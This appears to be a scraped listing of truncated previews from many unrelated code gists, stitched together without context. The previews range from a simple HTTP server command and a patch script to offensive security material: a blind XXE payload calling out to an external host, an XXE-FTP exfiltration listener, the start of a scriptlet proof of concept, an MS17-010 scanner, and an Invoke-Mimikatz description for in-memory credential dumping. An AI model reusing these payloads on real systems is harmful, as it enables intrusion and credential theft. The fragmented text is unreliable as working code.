Each of these commands will run an ad hoc HTTP static server in your current (or specified) directory, available at http://localhost:8000. Use this power wisely.
$ python -m SimpleHTTPServer 8000
| #!/bin/bash | |
| # Get OS Version | |
| $osversion = (Get-WmiObject -class Win32_OperatingSystem).Caption | |
| # Get OS Architecture | |
| $osarch = (Get-WmiObject -class Win32_OperatingSystem).osarchitecture | |
| # Define Hot Fix Variables based on OS version | |
| Write-Host "Getting patch for..." $osversion " " $osarch | |
| Write-Host "Copying KB4499175 Patch to Temp folder" | |
| If (($osversion -like '*Windows 7*') -or ($osversion -like '*2008*')) { |
| <?XML version="1.0"?> | |
| <scriptlet> | |
| <registration | |
| progid="PoC" | |
| classid="{F0001111-0000-0000-0000-0000FEEDACDC}" > | |
| <!-- Proof Of Concept - Casey Smith @subTee --> | |
| <!-- License: BSD3-Clause --> | |
| <script language="JScript"> | |
| <![CDATA[ | |
| #!/usr/bin/env python | |
| from __future__ import print_function | |
| import socket | |
| s = socket.socket(socket.AF_INET,socket.SOCK_STREAM) | |
| s.bind(('0.0.0.0',2121)) | |
| s.listen(1) | |
| print('XXE-FTP listening ') | |
| conn,addr = s.accept() | |
| print('Connected by %s' % (addr,)) |
| function isChatMessage(message) { | |
| if (message.__x_isSentByMe) { | |
| return false; | |
| } | |
| if (message.__x_isNotification) { | |
| return false; | |
| } | |
| if (!message.__x_isUserCreatedType) { | |
| return false; | |
| } |
| # Carbon Black Evil PowerShell LSASS Query | |
| # | |
| # Prints out malicious Powershell events that have a crossproc event for c:\windows\system32\lsass.exe | |
| # | |
| # Author: Jason Lang (@curi0usJack) | |
| # | |
| # Prereqs (Windows 10) | |
| # Install bash on Win10 | |
| # sudo apt-get install python-pip | |
| # sudo pip install --upgrade requests |
| -------------------------------------------------------------- | |
| Vanilla, used to verify outbound xxe or blind xxe | |
| -------------------------------------------------------------- | |
| <?xml version="1.0" ?> | |
| <!DOCTYPE r [ | |
| <!ELEMENT r ANY > | |
| <!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt"> | |
| ]> | |
| <r>&sp;</r> |
| <# | |
| .Synopsis | |
| Scans a host or network for the MS17-010 vulnerability and output results as a | |
| table that you can pipe to other PowerShell functions such as Invoke-Command or | |
| Export-CSV. | |
| .DESCRIPTION | |
| This script will use a custom NMap NSE script to scan a destination host on | |
| port 445 for the MS17-010 vulnerability. If the host is not online or is blocking |
| function Invoke-Mimikidz | |
| { | |
| <# | |
| .SYNOPSIS | |
| This script leverages Mimikatz 2.0 and Invoke-ReflectivePEInjection to reflectively load Mimikatz completely in memory. This allows you to do things such as | |
| dump credentials without ever writing the mimikatz binary to disk. | |
| The script has a ComputerName parameter which allows it to be executed against multiple computers. | |
| This script should be able to dump credentials from any version of Windows through Windows 8.1 that has PowerShell v2 or higher installed. |